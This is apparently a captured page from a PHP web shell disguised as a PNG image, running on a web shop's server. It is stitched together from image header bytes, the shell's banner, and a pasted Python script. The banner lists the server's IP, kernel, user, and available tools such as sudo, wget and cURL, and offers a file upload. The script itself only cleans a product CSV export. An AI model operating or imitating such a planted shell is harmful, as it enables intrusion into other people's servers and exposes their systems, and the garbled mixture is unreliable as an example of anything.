PNG IHDR wSȚ -tEXtComment Nxplo
| Server IP : 144.76.1.235 / Your IP : 216.73.216.244 Web Server : Apache/2.4.52 (Ubuntu) System : Linux einkaufsring.com 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.3.16 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/shop.einkaufsring.com/ |
Upload File : |
python3 - <<'PY'
import csv, sys, os, re, unicodedata
src = "/var/www/shop.einkaufsring.com/var/import/products/Artikelexport.csv"
dst = "/tmp/Artikelexport_sanitized.csv"
# read bytes -> strip UTF-8 BOM if present
raw = open(src, 'rb').read()
if raw.startswith(b'\xef\xbb\xbf'):
raw = raw[3:]
text = raw.decode('utf-8', errors='replace').replace('\r\n','\n').replace('\r','\n')
def clean_header(h):
if h is None: return ''
# normalize unicode spaces, remove control chars, trim quotes/spaces
h = ''.join(' ' if unicodedata.category(c) in ('Zs','Zl','Zp') else c for c in h)
h = re.sub(r'[\u0000-\u001F\u007F]', '', h)
return h.strip(' \t\n\r\x0b\x0c"')
lines = text.split('\n')
r = csv.reader(lines)
rows = list(r)
if not rows:
print("Empty CSV", file=sys.stderr); sys.exit(2)
header = [clean_header(h) for h in rows[0]]
# drop duplicates, keep first
seen = set(); new_header = []; idx_map = []
for i,h in enumerate(header):
k = h.lower()
if not k or k in seen:
continue
seen.add(k); new_header.append(h); idx_map.append(i)
# drop visibility column(s)
keep_idx = [i for i,h in enumerate(new_header) if h.lower()!="visibility"]
header2 = [new_header[i] for i in keep_idx]
# ensure product_online
if "product_online" not in [h.lower() for h in header2]:
header2.append("product_online")
# ensure url_key
if "url_key" not in [h.lower() for h in header2]:
header2.append("url_key")
# helper maps
lower_index = {h.lower(): j for j,h in enumerate(header2)}
def slugify(s):
if not s: return "item"
t = unicodedata.normalize('NFKD', s)
t = t.encode('ascii','ignore').decode('ascii')
t = re.sub(r'[^a-zA-Z0-9]+','-', t).strip('-').lower()
return t or 'item'
out = []
out.append(header2)
seen_urls = set()
for rawrow in rows[1:]:
if not any(rawrow):
continue
# row projected through first de-dup
row1 = [rawrow[i] if i<len(rawrow) else '' for i in idx_map]
# drop visibility
row2 = [row1[i] for i in keep_idx]
row2 += [''] * (len(header2)-len(row2))
# product_online -> 1
row2[lower_index["product_online"]] = '1'
# url_key -> ensure exists & unique
sku = row2[lower_index.get("sku", -1)] if lower_index.get("sku",-1) >= 0 else ''
name = row2[lower_index.get("name",-1)] if lower_index.get("name",-1) >= 0 else ''
url_idx = lower_index["url_key"]
url = (row2[url_idx] or '').strip()
if not url:
base = slugify(name or sku)
cand = base + (('-' + sku.lower()) if sku else '')
else:
cand = slugify(url)
u = cand; n=1
while u in seen_urls:
n += 1; u = f"{cand}-{n}"
seen_urls.add(u)
row2[url_idx] = u
out.append(row2)
with open(dst, 'w', newline='', encoding='utf-8') as g:
csv.writer(g).writerows(out)
print(dst)
PY